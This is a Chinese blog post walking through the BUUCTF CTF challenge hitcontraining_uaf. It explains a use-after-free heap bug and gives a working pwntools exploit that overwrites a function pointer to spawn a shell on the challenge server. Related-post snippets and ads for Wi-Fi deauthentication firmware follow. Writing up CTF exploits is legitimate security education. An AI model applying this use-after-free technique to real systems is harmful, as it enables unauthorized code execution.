[BUUCTF-pwn]——hitcontraining_uaf

最新推荐文章于 2024-07-04 23:59:54 发布
原创 最新推荐文章于 2024-07-04 23:59:54 发布 · 457 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一个利用UAF漏洞的CTF题目实战案例。通过具体步骤展示了如何利用两次内存分配与释放的特性,修改函数指针并执行自定义代码。涉及技巧包括双节点重用和函数指针覆盖。

[BUUCTF-pwn]——hitcontraining_uaf

还是先checksec一下
在这里插入图片描述

在IDA中,三个比较关键的函数
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

我们可以发现add会申请两次内存,第一次申请8个字节,前四个字节指向print_note_content这个函数, 后四个字节指向我们写入的字符串(count会加1)

delete则会将刚才申请的两块空间给删除(count不会减一), 但是并不会指向NULL

printf函数会调用add申请的第一个8个字节中的前四个字节指向的函数

思路

首先我们可以先add两次第一个我们称为a, 第二个称为b, 注意内容的大小一定要超过8, 这里我们取40,分别为A, B

然后delete掉a(free A, a), 再delete b(free B, b), 这个时候如果我们再次add一个c,并且内容大小设为8

那么第一个8个字节c其实就是b, 就是我们第二个8个字节C其实就是a
这个时候我们写进去的东西就会覆盖原有的, 但是原先的指针仍然指向它.
我们就可以可以将print_note_content函数, 改为我们想要执行的函数了

(这个因为比较小输入fast bin范畴, 所以是先进后出.)

from pwn import*

p=remote('node3.buuoj.cn',26828)
#p = process('./hacknote')
#gdb.attach(p)
def add(size,content):
  p.sendlineafter('choice :','1')
  p.sendlineafter('Note size :',str(size))
  p.sendlineafter('Content :',content)

def delete(index):
  p.sendlineafter('choice :','2')
  p.sendlineafter('Index :',str(index))

def printf(index):
  p.sendlineafter('choice :','3')
  p.sendlineafter('Index :',str(index))

shell_addr=0x8048945

add(40,'aaaa')
add(40,'bbbb')
delete(1)
delete(0)
add(8,p32(shell_addr))
printf(1)

#第二种思路大家也可以看一下
#add(8,'aaaa')
#delete(0)
#delete(0)
#add(40,'aaaa')
#add(8,p32(shell_addr))
#printf(1)

p.interactive()
[BUUCTF]PWN——hitcontraining_uaf
mcmuyanga的博客
09-07 2300
[BUUCTF]——hitcontraining_uaf 附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,非常常见的创建堆块的菜单 32位ida载入分析,shift+f12查看程序里的字符串,发现了/bin/sh,ctrl+x,跟进找到了后面函数,shell_addr=0x8048945 堆的main函数很简单,逻辑很简单,也没什么好说的,直接看菜单的各个选项 add ...
BUUCTF hitcontraining_uaf
BengDouLove的博客
04-09 1068
这是我第一次自己做出来的堆题,,????动 没什么特别,,看一看代码 还是一个堆块管理系统,不过这次他管理的时候有些不一样 1.add 不一样就在这里,,如果要创建一个用户数据,,先malloc一个八字节的指针堆块(我这么叫。。里面放着指针),,这八字节,前四个字节是一个pirnt_note_content函数,,这个函数的作用是以他后面相邻四个字节的数据为指针,打印这个指针里面的内容;;;申请...
buuctf hitcontraining_uaf
cainiao78777的博客
04-12 428
会把指针堆块1重新分配给我们,context堆块会把指针堆块0分配给我们(因为我们申请一个堆块实际上是申请两个堆块(一个指针堆块,一个context堆块))程序是先申请一个指针堆块,这个指针堆块的大小为8字节,前四字节存储的是puts函数的指针,后四字节存储的是要申请的堆块内容指针就是相当于这样。3.打印堆块内容,这段代码会把指针堆块的第一个指针来执行函数,如果把第一个指针修改为后门函数指针,就能getshell。2.释放堆块,这个操作,在释放堆块之后,并未把指针置零,所以存在uaf漏洞。
BUUCTF-pwn-hitcontraining_uaf(UAF)
半岛铁盒的博客
06-05 438
这道题可以用来当做堆的入门题来做 开了NX 这是堆的菜单;
hitcontraining_uaf
m0sway的博客
11-27 293
hitcontraining_uaf 使用checksec查看: 看题目名,应该是用UAF去解题 拉进IDA中看下add函数: 可以发现,add一个note会malloc两个堆,第一个堆不可控,大小默认为0x8,储存函数。第二个堆是用户可控的context。 本来是想看Edit函数的,结果发现这个程序并没有这个函数,给的是print: print调用的是add_note中第一个chunk指针指向的内容,也就是print_note_content进行输出操作。 那就只能从print_note_conte
精选资源
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
精选资源
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF-PWN】4-ciscn_2019_n_1
燕麦葡萄干的博客
07-04 707
这里为了堆栈平衡+1反而没办法打通,不+1反而可以成功,因此后面做题的时候加不加1都试一下。需要v1变量溢出到v2,然后给v2 11.28125的值。查看变量在栈中的位置:v1 0x30 v2 0x04。11.28125的十六进制值是0x41348000。checksec检查是64位,开启了NX保护。这里再试验第二种思路,溢出到变量2。后门函数的地址是0x4006BE。
BUUCTF-PWN】5-pwn1_sctf_2016
燕麦葡萄干的博客
07-04 358
变量s在栈中的位置位0x3c,想要溢出到Rbp需要60+4(因为是32位)=64。fgets()函数只允许输入32位长度,但是I可以变为you,因此可以输入20个I加三个a。这里中间处理的代码还看不太懂,只能看到you、i还有replace字符替换函数。试着运行效果如下,可知代码会把输入的I替换为you。找一下后门函数,函数的位置是0x8048F0D。strcpy()函数存在缓冲区溢出。32位,开启了NX保护。
BUUCTF-PWN】3-warmup_csaw_2016
燕麦葡萄干的博客
07-04 396
checksec检查是64位,未开启任何保护。直接字符串查找system或者flag。后门函数的地址是0x40060D。gets()函数存在栈溢出。
buu|hitcontraining_uaf 1
m0_64236521的博客
07-09 288
hitcontraining_uaf 1 这里一次会申请两个堆,其中第一个堆放着print_note_content 前4个字节位是print_note_content函数地址,这个堆块儿存在了notelist中 在执行print_notet时,会调用notelist里存储print_note_content函数地址的堆块儿,及我们只需将notelist里堆块儿存的print_note_content函数地址改成后门函数地址即可 申请两个堆块儿 释放掉 0x10里有两个堆,都是之前存...
buuctf-pwn入门
最新发布
01-26
### BUUCTF PWN 类题目入门教程 #### 学习资源推荐 对于希望进入PWN挑战领域的新手来说,选择合适的教材和平台至关重要。王爽老师的《汇编语言》提供了基础理论支持,有助于理解底层操作原理[^1]。此外,《IDA Pro权威指南》能够帮助掌握逆向工程工具的使用技巧,这对解决PWN问题非常有帮助[^1]。 #### 实践平台建议 为了更好地练习技能并应用所学知识,在线实践环境不可或缺。BuuOJ是一个专门为CTF爱好者设计的学习与交流社区,其中包含了大量针对不同难度级别的PWN题目供玩家尝试解答[^2]。通过不断做题积累经验,可以逐步提高自己的技术水平。 #### 解决方案流程概述 当面对具体的PWN题目时,通常遵循以下几个步骤来构建解决方案: - **检测保护机制**:利用`checksec`命令查看目标程序启用了哪些安全防护措施; - **静态分析**:借助IDA Pro等反汇编器对二进制文件进行深入剖析,找出潜在漏洞点; - **编写Exploit脚本**:基于发现的安全缺陷精心构造攻击载荷; - **测试验证**:最后一步是在本地环境中反复调试直至成功获取Flag。 ```bash # 使用 checksec 工具检查可执行文件的安全特性 $ checksec ./vuln_program ``` ```python from pwn import * # 连接到远程服务器上的服务端口 conn = remote('example.com', 9999) # 发送恶意输入数据给存在缓冲区溢出漏洞的服务进程 payload = b'A' * offset + pack(address) conn.sendline(payload) # 接收返回的数据包以确认是否获得shell访问权限 response = conn.recv() print(response.decode()) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值